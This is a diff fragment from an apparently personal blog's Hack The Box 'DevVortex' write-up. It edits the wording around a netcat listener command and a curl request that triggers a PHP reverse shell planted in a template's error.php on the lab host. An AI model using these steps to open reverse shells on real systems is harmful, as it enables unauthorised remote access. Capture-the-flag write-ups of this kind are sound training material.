Vorkharium/vorkharium.github.io/_posts/2024-11-20-HTB-DevVortex-Write-up.md

 nc -lvnp 8443
 ```

-Visit the following URL to trigger the URL:
+Visit the following URL to trigger the PHP reverse shell inside error.php:

 ```shell
 curl -k "http://dev.devvortex.htb/templates/cassiopeia/error.php/error"
 ```

-This will trigger our reverse shell and give us a response on our nc listener:
+After that, we will get a response on our nc listener:

 ```shell
 listening on [any] 8443 ...